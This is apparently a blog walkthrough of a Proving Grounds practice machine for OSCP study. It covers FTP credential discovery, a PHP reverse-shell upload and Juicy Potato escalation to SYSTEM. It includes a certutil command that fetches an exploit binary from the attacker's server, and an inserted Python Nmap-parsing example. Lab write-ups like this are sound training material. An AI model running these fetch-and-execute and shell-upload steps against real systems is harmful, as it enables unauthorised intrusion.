Mr.KaaLi's JARV!$

OSCP Prep Box 70 – AuthBy

Posted on July 1, 2026

Difficulty – Intermediate

Platform – Proving Grounds Practice

Operating System – Windows

Focus Areas

  • FTP Enumeration
  • Credential Discovery
  • Web Shell Upload
  • Windows Enumeration
  • Juicy Potato Exploitation
  • Privilege Escalation

In this writeup, I leverage anonymous FTP access to uncover sensitive information and valid credentials that lead to a protected web application. By uploading a PHP reverse shell, I gain remote code execution and establish an initial foothold on the target. After performing local enumeration, I exploit Juicy Potato to abuse token impersonation privileges and escalate to NT AUTHORITY\SYSTEM.

Table of Contents
  • Recon & Enumeration
  • Exploitation
  • Privilege Escalation
  • Key Takeaways

Recon & Enumeration

Enumeration plays a very significant role in penetration testing: the more thoroughly you enumerate, the easier it is to get a foothold on the target.

First, we check whether the target is reachable with the ping command:

ping Target_IP

The ping output showed that the target is reachable.

Next we run a port scan with Nmap, a popular port scanner that reports which ports are open and which services are listening on them. The commands used were:

nmap -sC -sV -O -oA nmap/initial 192.168.190.46

nmap -sC -sV -O -p- -oA nmap/full -T4 192.168.190.46

I discovered these ports are open:

  • 21/tcp FTP service running zFTPServer 6.0 with anonymous access enabled
  • 242/tcp HTTP service running Apache httpd 2.2.21 (Win32) and PHP 5.3.8 (Basic Authentication enforced)
  • 3145/tcp zFTPServer administration service exposed
  • 3389/tcp Microsoft Remote Desktop Services (RDP)
  • OS: Microsoft Windows Server 2008 R2 Enterprise
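As an added example (not part of the original writeup), the following Python script parses the XML file that `-oA` writes, produces the same structured list of open ports, and flags the two weaknesses the rest of this chain depends on: anonymous FTP login and HTTP Basic authentication. The embedded XML is a constructed sample modelled on these scan results, not real Nmap output, and the realm name and service labels in it are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on the findings in this writeup; not real scan output.
SAMPLE_XML = """<nmaprun><host><address addr="192.168.190.46" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="21"><state state="open"/>
 <service name="ftp" product="zFTPServer" version="6.0"/>
 <script id="ftp-anon" output="Anonymous FTP login allowed (FTP code 230)"/></port>
<port protocol="tcp" portid="242"><state state="open"/>
 <service name="http" product="Apache httpd" version="2.2.21" extrainfo="(Win32) PHP/5.3.8"/>
 <script id="http-auth" output="HTTP/1.1 401 Unauthorized Basic realm=AuthBy"/></port>
<port protocol="tcp" portid="3145"><state state="open"/>
 <service name="zftp-admin" product="zFTPServer admin"/></port>
<port protocol="tcp" portid="3389"><state state="open"/>
 <service name="ms-wbt-server" product="Microsoft Terminal Services"/></port>
<port protocol="tcp" portid="445"><state state="filtered"/></port>
</ports></host></nmaprun>"""


def parse_open_ports(xml_text):
    """Return [(port, service, product/version banner, {script_id: output})] for open ports."""
    results = []
    for port in ET.fromstring(xml_text).iter("port"):
        if port.find("state").get("state") != "open":
            continue  # skip closed/filtered ports, as the hand-written list above does
        svc = port.find("service")
        banner = ""
        if svc is not None:
            banner = " ".join(filter(None, (svc.get("product"), svc.get("version"), svc.get("extrainfo"))))
        scripts = {s.get("id"): s.get("output", "") for s in port.findall("script")}
        name = svc.get("name") if svc is not None else ""
        results.append((int(port.get("portid")), name, banner, scripts))
    return results


def flag_findings(entries):
    """Flag the two weaknesses this box hinges on: anonymous FTP and HTTP Basic auth."""
    findings = []
    for port, _service, _banner, scripts in entries:
        if "Anonymous FTP login allowed" in scripts.get("ftp-anon", ""):
            findings.append((port, "anonymous FTP login allowed"))
        if "Basic realm" in scripts.get("http-auth", ""):
            findings.append((port, "HTTP Basic authentication over plain HTTP"))
    return findings


if __name__ == "__main__":
    entries = parse_open_ports(SAMPLE_XML)
    for port, service, banner, _ in entries:
        print(f"{port}/tcp {service:14} {banner}")
    for port, note in flag_findings(entries):
        print(f"FINDING port {port}: {note}")
```

Point it at `nmap/full.xml` (read the file into `xml_text`) to get the same output for a real scan.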

Then I checked the anonymous FTP share and found an accounts directory; inside it were the admin account details:

Then I downloaded all the files using mget *:

Upon inspecting the files I discovered credentials, which presumably belong to the HTTP service on port 242:

The credentials worked:

Exploitation

Then, using revshell, a reverse shell was generated:

Using FTP, the shell was uploaded to the target:

Then a netcat listener was started and we obtained the foothold:

The local.txt flag was discovered.

Privilege Escalation

Now it was time to escalate privileges.

Using whoami /priv I discovered that SeImpersonatePrivilege was enabled. The system info also revealed that the target is running Windows Server 2008 Standard, so I used Juicy Potato for privilege escalation:

https://github.com/ivanitlearning/Juicy-Potato-x86/releases

I hosted it using a Python web server:

I used the Windows CertUtil utility to download the Juicy Potato binary from my web server with the following command and then executed the exploit:

certutil -urlcache -split -f http://192.168.45.156/Juicy.Potato.x86.exe

I supplied the arguments without the -c CLSID parameter so that Juicy Potato would use its default CLSID.

A CLSID (Class Identifier) is a unique 128-bit GUID used by Microsoft’s COM (Component Object Model) architecture to identify a specific COM class or service. I also chose port 1250 (for no particular reason) and used -p to execute the program with elevated privileges:

The default CLSID didn’t work:

I used the following list to look for CLSIDs:

https://github.com/ohpe/juicy-potato/tree/master/CLSID/

The target appears to be running Windows Server 2008 R2 Enterprise, so I used a CLSID listed for that version and it worked.

I then used it to spawn a reverse shell with the nc binary:

The above image shows the proof.txt file.

Key Takeaways

  • Anonymous services often expose more information than intended and can become a valuable starting point for an attack chain.
  • Credentials may be scattered across configuration files, backups, and authentication-related artifacts, making comprehensive enumeration critical.
  • Weak or reused passwords can quickly transform information disclosure into full application compromise.
  • File upload functionality should be strictly controlled and validated to prevent arbitrary code execution.
  • Accurate operating system identification helps narrow down viable privilege escalation techniques.
  • The presence of SeImpersonatePrivilege can significantly increase the impact of a compromised service account.
  • Modern attacks frequently rely on chaining multiple low-to-medium severity issues rather than a single critical vulnerability.
  • Methodical enumeration at every stage often reveals the path to compromise more effectively than aggressive exploitation attempts.
